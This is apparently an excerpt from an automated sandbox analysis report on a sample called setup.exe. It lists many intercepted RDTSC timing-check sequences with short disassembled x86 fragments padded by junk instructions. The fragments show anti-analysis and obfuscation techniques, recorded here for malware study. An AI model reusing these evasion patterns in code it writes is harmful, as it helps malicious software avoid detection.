Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4A15D6 second address: 4A15DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4A15DE second address: 4A15EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F47D8E48266h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4A15EF second address: 4A1602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jl 00007F47D8E3B0AEh 0x0000000b jnc 00007F47D8E3B0A6h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4A1E45 second address: 4A1E4A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4A50A2 second address: 4A50AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4A50AE second address: 4A50B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4A50B2 second address: 4A50F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edx 0x0000000c jmp 00007F47D8E3B0B3h 0x00000011 pop edx 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push eax 0x00000016 jbe 00007F47D8E3B0A6h 0x0000001c pop eax 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jc 00007F47D8E3B0ACh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4A6489 second address: 4A648D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4A9FC9 second address: 4A9FCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4A9FCF second address: 4A9FD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4A9FD5 second address: 4A9FDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4A9FDE second address: 4A9FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F2001E second address: 4F20024 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F20024 second address: 4F20029 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F20029 second address: 4F20076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F47D8E3B0B4h 0x0000000f push eax 0x00000010 jmp 00007F47D8E3B0ABh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F47D8E3B0B6h 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov di, 3A30h 0x00000024 mov ah, dh 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F10148 second address: 4F1015F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E48272h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F1015F second address: 4F1017F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 mov si, 4C99h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 mov eax, 648EF5D1h 0x00000015 mov al, 1Eh 0x00000017 popad 0x00000018 pop ebp 0x00000019 pushad 0x0000001a mov ecx, edi 0x0000001c push eax 0x0000001d push edx 0x0000001e mov ah, bh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F40705 second address: 4F4070B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F4070B second address: 4F4070F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F4070F second address: 4F4075F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f mov edi, esi 0x00000011 pushfd 0x00000012 jmp 00007F47D8E48270h 0x00000017 jmp 00007F47D8E48275h 0x0000001c popfd 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F47D8E4826Dh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE0096 second address: 4EE009C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE009C second address: 4EE00A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE00A0 second address: 4EE00BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov si, di 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE00BC second address: 4EE00C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE00C1 second address: 4EE00D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E3B0B1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE00D6 second address: 4EE00F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F47D8E48273h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE00F4 second address: 4EE012C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F47D8E3B0ABh 0x0000000b add cl, 0000006Eh 0x0000000e jmp 00007F47D8E3B0B9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE012C second address: 4EE0130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE0130 second address: 4EE0136 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE0136 second address: 4EE0167 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48272h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F47D8E48270h 0x00000010 push dword ptr [ebp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE0167 second address: 4EE016B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE016B second address: 4EE0171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE0171 second address: 4EE0177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE0177 second address: 4EE017B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE017B second address: 4EE019E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F47D8E3B0B4h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE019E second address: 4EE01A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F00DBA second address: 4F00DE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F47D8E3B0AAh 0x00000012 mov ax, 3C51h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F00DE2 second address: 4F00E84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F47D8E4826Dh 0x00000009 sub si, 8F66h 0x0000000e jmp 00007F47D8E48271h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b mov esi, 2C049B69h 0x00000020 mov esi, 4E428525h 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F47D8E4826Eh 0x0000002f adc esi, 6327B238h 0x00000035 jmp 00007F47D8E4826Bh 0x0000003a popfd 0x0000003b pushfd 0x0000003c jmp 00007F47D8E48278h 0x00000041 add eax, 6328AC98h 0x00000047 jmp 00007F47D8E4826Bh 0x0000004c popfd 0x0000004d popad 0x0000004e pop ebp 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F47D8E48275h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F00E84 second address: 4F00E89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F008AD second address: 4F008BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F008BC second address: 4F0094D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 44h 0x00000005 mov ecx, 488C28C7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f mov si, 69BFh 0x00000013 mov esi, 2BCAE2DBh 0x00000018 popad 0x00000019 push eax 0x0000001a pushad 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F47D8E3B0ADh 0x00000022 or al, 00000066h 0x00000025 jmp 00007F47D8E3B0B1h 0x0000002a popfd 0x0000002b mov bl, ah 0x0000002d popad 0x0000002e pushfd 0x0000002f jmp 00007F47D8E3B0ADh 0x00000034 add eax, 30B38CC6h 0x0000003a jmp 00007F47D8E3B0B1h 0x0000003f popfd 0x00000040 popad 0x00000041 xchg eax, ebp 0x00000042 jmp 00007F47D8E3B0AEh 0x00000047 mov ebp, esp 0x00000049 jmp 00007F47D8E3B0B0h 0x0000004e pop ebp 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F0094D second address: 4F00951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F00951 second address: 4F0096E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F007F8 second address: 4F007FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F007FC second address: 4F00800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F00800 second address: 4F00806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F00806 second address: 4F0081F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov si, bx 0x00000011 mov ecx, ebx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F0081F second address: 4F00825 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F00825 second address: 4F00829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F00829 second address: 4F00862 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop eax 0x0000000e pushfd 0x0000000f jmp 00007F47D8E48271h 0x00000014 xor ecx, 278D4C96h 0x0000001a jmp 00007F47D8E48271h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F00862 second address: 4F00868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F00868 second address: 4F0086C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F004DB second address: 4F00577 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d pushad 0x0000000e mov ebx, esi 0x00000010 pushfd 0x00000011 jmp 00007F47D8E3B0AEh 0x00000016 jmp 00007F47D8E3B0B5h 0x0000001b popfd 0x0000001c popad 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F47D8E3B0B3h 0x00000027 or esi, 17473A4Eh 0x0000002d jmp 00007F47D8E3B0B9h 0x00000032 popfd 0x00000033 pushad 0x00000034 mov esi, 3521462Dh 0x00000039 jmp 00007F47D8E3B0AAh 0x0000003e popad 0x0000003f popad 0x00000040 pop ebp 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 mov cx, bx 0x00000047 push ebx 0x00000048 pop esi 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F10353 second address: 4F1036D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48276h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F20386 second address: 4F203B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F47D8E3B0AFh 0x00000008 pop ecx 0x00000009 mov eax, edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F47D8E3B0B1h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F203B2 second address: 4F203B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F203B8 second address: 4F203D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F47D8E3B0B1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F203D6 second address: 4F203EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48271h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F203EB second address: 4F203FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E3B0ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F203FB second address: 4F203FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F0071C second address: 4F00746 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 96D2h 0x00000007 mov ecx, edx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007F47D8E3B0B2h 0x00000012 mov dword ptr [esp], ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov ax, dx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F00746 second address: 4F0074B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F0074B second address: 4F0075A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E3B0ABh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F0075A second address: 4F00781 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48279h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F00781 second address: 4F00785 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F00785 second address: 4F0078B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F0078B second address: 4F00791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F00791 second address: 4F00795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F10F76 second address: 4F10F7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F10F7C second address: 4F10F80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F10F80 second address: 4F10F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F10F8F second address: 4F10F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F10F93 second address: 4F10F97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F10F97 second address: 4F10F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F201C5 second address: 4F201C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F201C9 second address: 4F201CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F201CF second address: 4F201E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E3B0ADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F40011 second address: 4F40021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E4826Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F40021 second address: 4F40057 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a mov ch, 41h 0x0000000c jmp 00007F47D8E3B0AFh 0x00000011 popad 0x00000012 mov dword ptr [esp], ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F47D8E3B0B5h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F40057 second address: 4F40067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E4826Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F40067 second address: 4F4007D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F47D8E3B0AAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F4007D second address: 4F40083 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F40083 second address: 4F40129 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a push esi 0x0000000b movsx edx, si 0x0000000e pop eax 0x0000000f call 00007F47D8E3B0ADh 0x00000014 jmp 00007F47D8E3B0B0h 0x00000019 pop eax 0x0000001a popad 0x0000001b mov dword ptr [esp], ecx 0x0000001e jmp 00007F47D8E3B0B1h 0x00000023 mov eax, dword ptr [774365FCh] 0x00000028 pushad 0x00000029 jmp 00007F47D8E3B0ACh 0x0000002e pushfd 0x0000002f jmp 00007F47D8E3B0B2h 0x00000034 and eax, 00816F08h 0x0000003a jmp 00007F47D8E3B0ABh 0x0000003f popfd 0x00000040 popad 0x00000041 test eax, eax 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 call 00007F47D8E3B0ABh 0x0000004b pop ecx 0x0000004c call 00007F47D8E3B0B9h 0x00000051 pop ecx 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F40129 second address: 4F4013A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E4826Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F4013A second address: 4F4013E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
